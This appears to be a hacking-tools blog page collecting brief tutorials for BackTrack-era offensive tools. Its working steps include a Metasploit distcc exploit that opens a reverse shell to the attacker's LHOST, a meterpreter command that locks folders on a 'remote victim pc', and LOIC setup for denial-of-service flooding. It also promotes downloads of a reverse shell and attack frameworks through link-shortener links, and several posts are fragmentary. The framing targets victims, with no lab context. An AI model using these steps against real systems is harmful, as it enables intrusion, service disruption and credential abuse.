Reflective DLL Injection Metasploit Module

 

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download  : Reflective DLL Injection Exploit

VIDEO TUTORIAL : 

Windows Manage Memory Payload Injection

This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject

VIDEO :  
 

WebSploit Framework : java applet attack

WebSploit Is An Open Source Project For :

Social Engineering Works
Scan,Crawler & Analysis Web
Automatic Exploiter
Support Network Attacks
Autopwn - Used From Metasploit For Scan and Exploit Target Service
wmap - Scan,Crawler Target Used From Metasploit wmap plugin
format infector - inject reverse & bind payload into file format
phpmyadmin Scanner
CloudFlare resolver
LFI Bypasser
Apache Users Scanner
Dir Bruter
admin finder
MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
MITM - Man In The Middle Attack
Java Applet Attack
MFOD Attack Vector
USB Infection Attack
ARP Dos Attack
Web Killer Attack
Fake Update Attack
Fake Access point Attack
Wifi Honeypot
Wifi Jammer
Wifi Dos
Bluetooth POD Attack

The Java Applet Attack considers as one of the most successful and popular methods for compromising a system.Popular because we can create the infected Java applet very easily,we can clone any site we want that will load the applet very fast

The Java applet Attack vector affects:

• Windows Systems
• Linux Systems and
• Mac OS X 

Click here to Download WebSploit Framework 

Zip File Password Cracker Python Script

Today we will create python script to crack zip-file password. This script use dictionary attack for Crack Password.

Click Here to Download Zip File Password Cracker Python Script 

Xprobe2 - active OS fingerprinting tool

Xprobe2 is use for perform fingerprinting on remote target.

Download Xprobe2

Installation(Bactrack and kali Linux has built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target(traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set receive timeout to receive_timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set packsending delay (milseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Options forces TCP handshake module to try to guess open TCP port

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.

keimpx – SMB Credential Scanner

keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

1. Combination of user / plain-text password.
2. Combination of user / NTLM hash.
3. Combination of user / NTLM logon session token.

If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

1. Spawn an interactive command prompt.
2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
4. List users details, domains and password policy.

Download : Keimpx - SMB Credential Scanner

Fix msfupdate Problem

Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

The possibility of this error was their because while i was running the msfupdate command it shows me a error in some pg-0.15.1 package installation.

solution

• Go the this path (for 64 bit backtrack 5r3) - root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/

• Edit this file rbconfig.rb

• Search for this line - CONFIG["LIBRUBYARG_STATIC"] = “-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static”  and Remove this - -l$(RUBY_SO_NAME)-static

• Save 

Video :

Golismero.py Web tool in BackTrack 5 R3

What is GoLISMERO?

GoLISMERO is a web spider is able to detect vulnerabilities and format results a very useful when starting a web audit.

It's for?

GoLISMERO is intended to be a first step when starting a web security audit.

Every time we face a new URL, would not it be great to have easily and quick all the links, forms with parameters, to detect possible URL vulnerable and in addition to being presented so that gives us an idea of ​​all points of entry where we could launch attacks? GoLISMERO lets us do all this.

Click Here to Watch Video[Tutorial]

Learning with examples

Remember: For execute GoLismero you need python 2.7.X or abobe.

Below are several examples and case studies, which are the best way to learn to use a security tool.

1. Getting all links and forms from a web, with all its parameters, extended format:

GoLISMERO.py –t google.com

1. Getting all links, on compact mode, and colorize output:

GoLISMERO.py –c –m –t google.com

1. Getting only links. Removing css, javascript, images and mails:

GoLISMERO.py --no-css--no-script --no-images --no-mail –c –A links –m –t google.com

Or, reduced format:

GoLISMERO.py –na –c –A links –m –t google.com

1. Getting only links with params and follow redirects (HTTP 302) and export results in HTML:

GoLISMERO.py –c –A links --follow –F html –o results.html –m –t google.com



And HTML generated code:

1. Getting all links, looking for potentially vulnerable URL and using an intermediate proxy to analyze responses. The URLs or vulnerable parameters are highlighted in red.

GoLISMERO.py –c –A links --follow -na –x –m –t terra.com



Check as ZAP Proxy capture request:



VIDEO :

Dorking with Fimap in BackTrack 5 R3

fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable.

The goal of fimap is to improve the quality and security of your website.

Quick News for SVN and upcoming versions

• Bing searching module implemented in SVN! Currently broken :-O


• SSH-Logfiles can now be scanned and exploited through SSH username!


• You can now define which target to exploit and execute shell commands without the interactive exploit interface! (FimapNonInteractiveExec)


• New experimental fallback plugin which you can try when just /etc/passwd (or any other only-readable file was found. (FimapPhpInfoExploit)


• New fallback plugin for windows victims! (FimapFindFirstFileExploit)

what works currently?

• Check a Single URL, List of URLs, or Google results fully automaticly.


• Can identify and exploit file inclusion bugs.
  
  
  
  • Relative\Absolute Path Handling.
  
  
  • Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation.
  
  
  • Remotefile Injection.
  
  
  • Logfile Injection. (FimapLogInjection)
  
  
  
  


• Test and exploit multiple bugs:
  
  
  
  • include()
  
  
  • include_once()
  
  
  • require()
  
  
  • require_once()
  
  
  
  


• You always define absolute pathnames in the configs. No monkey like redundant pathes like:
  
  
  
  • ../etc/passwd
  
  
  • ../../etc/passwd
  
  
  • ../../../etc/passwd
  
  
  
  


• Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode


• Has an interactive exploit mode which...
  
  
  
  • ...can spawn a shell on vulnerable systems.
  
  
  • ...can spawn a reverse shell on vulnerable systems.
  
  
  • ...can do everything you have added in your payload-dict inside the config.py
  
  
  
  


• Add your own payloads and pathes to the config.py file.


• Has a Harvest mode which can collect URLs from a given domain for later pentesting.


• Goto FimapHelpPage for all features.


• Works also on windows.


• Can handle directories in RFI mode like:
  
  
  
  • <? include ($_GET["inc"] . "/content/index.html"); ?>
  
  
  • <? include ($_GET["inc"] . "_lang/index.html"); ?>
  
  
  • where Null-Byte is not possible.
  
  
  
  


• Can use proxys.


• Scans and exploits GET, POST and Cookies.


• Has a very small footprint. (No senseless bruteforcing of pathes - unless you need it.)


• Can attack also windows servers! (WindowsAttack)


• Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)
  
  
  
  • Check out the PHPInfo() Exploit plugin: FimapPhpInfoExploit
  
  
  
  


• Non Interactive Exploiting (FimapNonInteractiveExec)

what doesn't work yet?

• Other languages than PHP (even if engine is ready for others as well.)

VIDEO :

Python Reverse shell

simple reverse shell written in Python (BSIDESLV and Defcon 20 Demo)

Download Python Reverse shell - http://adf.ly/LVvor

VIDEO :

DistCC Daemon Command Execution

This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3

Commands :

msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit

VIDEO

Vulnerability Scanner uniscan.pl in Backtrack 5 R3

The Uniscan is a vulnerability scanner for Web applications, written in perl for Linux environment. It was developed as conclusion work of the computer science course of Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

Features Of Uniscan:

• Identification of system pages through a Web Crawler.


• Use of threads in the crawler.


• Control the maximum number of requests the crawler.


• Control of variation of system pages identified by Web Crawler.


• Control of file extensions that are ignored.


• Test of pages found via the GET method.


• Test the forms found via the POST method.


• Support for SSL requests (HTTPS).


• Proxy support.


• Generate site list using Google.


• Generate site list using Bing.


• Plug-in support for Crawler.


• Plug-in support for dynamic tests.


• Plug-in support for static tests.


• Plug-in support for stress tests.


• Multi-language support.


• Web client.


• GUI client written in perl using tk.

For Use :

perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

perl ./uniscan.pl -f sites.txt -bqweds

perl ./uniscan.pl -i uniscan

perl ./uniscan.pl -i xxx.xxx.xxx.xxx

perl ./uniscan.pl -u https://www.targetsite.com/ -r

VIDEO

How to lock and unlock folder in remote victim pc using metasploit

lock and unlock folder :

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

VIDEO

Windows Gather USB Drive History Metasploit Module

This module will enumerate USB Drive history on a target host.

Usage Information

msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options

SESSION	The session to run this module on.
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module

How to install LOIC(Low Orbit Ion Cannon) in Backtrack 5 R3

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Install LOIC :

1 - aptitude install git-core monodevelop

2 - Download loic.sh script wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

3 - Make Folder - mkdir <folder name>

4 - install - ./loic.sh install

5 - update - ./loic.sh update

6 - Run loic - ./loic.sh run

How to share folder in Backtrack 5 R3 to make accessible in Windows

1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

mkdir /var/www/share 

2. Change mode for the share folder into 755.

chmod -R 755 /var/www/share/ 


3. Change the ownership of that folder into www-data.

chown -R www-data:www-data /var/www/share/

5. Okay, everything we've set up correctly until this step. The next step is activate the apache server by running the service apache2 start command :

root@bt:~# service apache2 start 
* Starting web server apache2

if you didn't have apache2 installed, run
apt-get install apache2 command

Get Password Hint of Remote Victim PC Using Metasploit in Backtrack 5 R3

Description:

Download Metasploit - http://adf.ly/FYrSs
For More Information go to - http://adf.ly/Cwl6S

Microsoft Internet Explorer 8 Memory Corruption Vulnerability in Windows 7

Description:

Microsoft Internet Explorer 8 Memory Corruption Vulnerability  - http://adf.ly/FWDZ8

For More Information go to - http://adf.ly/FWDWQ

Weevely Backdoor Shell in Backtrack 5 R3

Description:

For More Information go to - http://adf.ly/FTdHN

W3AF(Web Application Attack and Audit Framework) Scanner in Backtrack 5 R3

Description:

For More Information go to - http://adf.ly/Cwl6S